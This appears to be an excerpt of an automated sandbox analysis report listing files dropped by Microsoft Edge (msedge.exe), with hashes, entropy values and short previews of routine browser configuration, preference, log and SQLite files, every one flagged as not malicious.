                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4660221377316737
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBBoO:v7doKsKuKZKlZNmu46yjxf
                                                                                                                                                                                                                                                                                                        MD5:86BDDC25D9BD6976ADEAD934CCF44E44
                                                                                                                                                                                                                                                                                                        SHA1:22DB68CF0D8531A683A27465BAFECF489ACCA0A3
                                                                                                                                                                                                                                                                                                        SHA-256:89F4BAFBE625183AAACC8DE50A0439DCA16B0761C1764929BB7D22EB70D0D279
                                                                                                                                                                                                                                                                                                        SHA-512:C40109DA91CE7E42D3DE438FF2BC6A3C8C031A99E97385EEBF72348636BF4D14C785040BDCF2157F6462BB38C7D2B4DC2F81427D962D807CC5AB18697FBEA7EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):12824
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.13449110291207422
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:vlvlllNllv/etXlf80xllholl1qvTv4RRfs21d7jdtQfQ7u/w0xllsvWXtXlf80r:vlvMl/lholrpRS+dndRIlOCln
                                                                                                                                                                                                                                                                                                        MD5:0612613A892C11C56EEF0270F70387B7
                                                                                                                                                                                                                                                                                                        SHA1:CED14E6A4712D9A3915C8977CC9369BEA6C5890D
                                                                                                                                                                                                                                                                                                        SHA-256:2EE215C95D9D510B4767CDA1DEE9448FFE4252BD33C2001DDDA3D0917CFBD61F
                                                                                                                                                                                                                                                                                                        SHA-512:C7FA9BF31F64DCE6F5D68390C21C24E28137B912E184F11D9A972EE1956E4EE6F0FF492CABCDC97576AB991E31FB6891CD5891D73C22FE2691F8224ACD5B6800
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                        MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                        SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                        SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                        SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:SQLite format 3 (binary content, not shown)
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.55847994360738
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:YQzzCVWwL7pLGLht4W5wSgf4ql8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPsEIVq7pf:YQ2VDdcht4WaSgfzlu1jalbIa3t6R
                                                                                                                                                                                                                                                                                                        MD5:4A013F77E04FA27E6BD639C5A84DCA4E
                                                                                                                                                                                                                                                                                                        SHA1:EB6F940E41571A0B8A1884B1DC827FEDD830A807
                                                                                                                                                                                                                                                                                                        SHA-256:404623AA8E423F8042FA847E56264AE217BB7C7A4A5AD757799EE51809C2D19D
                                                                                                                                                                                                                                                                                                        SHA-512:76EE460D7AFE2B7917BCA66987300F487BCC620B348E1A88B3B22CE6FE3E93318C1843E30CFAE300E220DE236F720B3853C0168C9C6257ADCFF36D5AEC9D9DBD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379538499699763","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379538499699763","location":5,"ma
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.10234774519367401
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:+jsjxLspEjVl/PnnnnnnnnnnnvoQ/Eou:+jsjWoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                        MD5:6553B7E3B17C5F8113F46F9A67A2FABA
                                                                                                                                                                                                                                                                                                        SHA1:189C5A52F556D8A5ED530624DEC74F73C2462ADF
                                                                                                                                                                                                                                                                                                        SHA-256:1CFCDF3C6D820F2E418F3602075BE8FAC50B38510020E106EABA5F4104537255
                                                                                                                                                                                                                                                                                                        SHA-512:B9DBE1D5FC547FDD9497439BA3D899D9124F1624DB26B8170A8E577107A3F9C071AE97C8DA3599D61E3FAA315B64BA4882EA2C2A0346B1D9819B5B14D945E728
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):317272
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8900699826953017
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:xfv+3vAQv5VvknvYPvmCvt3vZzvSruvU21IvB8v8RyTyewIyAy8yyaxy1A:7r
                                                                                                                                                                                                                                                                                                        MD5:E7BFEEA0D4063F8876BD212E5BD0B695
                                                                                                                                                                                                                                                                                                        SHA1:412C18C589D0E03F5702091B84B33AF4455E1416
                                                                                                                                                                                                                                                                                                        SHA-256:1726A62DCB2CE731E364CF8C8652EB53EC2A8570379DD0A8FCA042F90EB052C8
                                                                                                                                                                                                                                                                                                        SHA-512:C320E2630B85E254F404A1570432F83EF1892D3B4FAE1824DBBD816E38B625220C2402170442BE003FB5292D4354650F03607DD6416D0FCC50BF197B51B655A3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):628
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2463408753900866
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuuP8A:pHayp
                                                                                                                                                                                                                                                                                                        MD5:B468E199B505EAA4FA2B783110178BB6
                                                                                                                                                                                                                                                                                                        SHA1:2047889416562660ED243A337B773407E87B8626
                                                                                                                                                                                                                                                                                                        SHA-256:5A62B421BB390CE95EDC22BC62388190B54BE7AFADA1F9109141D8C62E7FD18A
                                                                                                                                                                                                                                                                                                        SHA-512:D870589DBB89F609C46C1C09CFFFF3EC39EBB69D3CB302FD0F03990AA67C588F3021AC4AE8F0D0E5085D89FA4B521C60C8ECD91639C152CE4B5320B2DCEA3086
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.217753065412729
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NkRB3+q2PN723oH+TcwtfrK+IFUt8E22NZmw+E22RVkwON723oH+TcwtfrUeLJ:WcvVaYeb23FUt8J2N/+J2/5OaYeb3J
                                                                                                                                                                                                                                                                                                        MD5:506871B8D8519B8E1FB85A28319C13DC
                                                                                                                                                                                                                                                                                                        SHA1:80AB6F2E965B0619044228F16C40DCC5A662C73D
                                                                                                                                                                                                                                                                                                        SHA-256:59369C21B99E9C5960F5C6080BA48195DC8E759EA20298CC7D9EC8548CA6AEBB
                                                                                                                                                                                                                                                                                                        SHA-512:2408D729E52D6D15C56AEAF9162610B7F06DDC8B13CDB20B6A443D38267AE39BA1810EE16A0788B873133BD278578C5297883B8DD221FB1F9E6A395D17085EA0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.614 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/24-13:28:20.709 db8 Recovering log #3.2024/12/24-13:28:20.709 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):816
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                        MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                        SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                        SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                        SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):343
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.185833633790373
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NUt+q2PN723oH+TcwtfrzAdIFUt8EkV7ZZmw+EkaVkwON723oH+TcwtfrzILJ:jvVaYeb9FUt877Z/+s5OaYeb2J
                                                                                                                                                                                                                                                                                                        MD5:A3D8113B4A4A5C25A98B5268BC4161D1
                                                                                                                                                                                                                                                                                                        SHA1:FF01A389652815B8C12FC63382D72ED0832B7FEB
                                                                                                                                                                                                                                                                                                        SHA-256:28E526D91020ECD34F887058D82DA24995A9D50FB4A99AA1422CA985FE70F6E0
                                                                                                                                                                                                                                                                                                        SHA-512:2A403AE63BE418F6D319D7FD52F02090FEEDAB1A5D7F5989AD138E51A4404D49E5EC3AB7AA80EB2D0AB237907D500C0E884B359667A158170FF131EE22EBA1F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.609 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/24-13:28:20.610 db8 Recovering log #3.2024/12/24-13:28:20.611 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                        MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                        SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                        SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                        SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.55
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):44455
Entropy (8bit):6.08983633118473
Encrypted:false
SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
MD5:DC1D934C1906D196754BA8C1310935B9
SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6773696719930975
Encrypted:false
SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                        MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                        SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                        SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                        SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):47
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                        MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                        SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                        SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                        SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                        MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                        SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                        SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                        SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):81
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                        MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                        SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                        SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                        SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
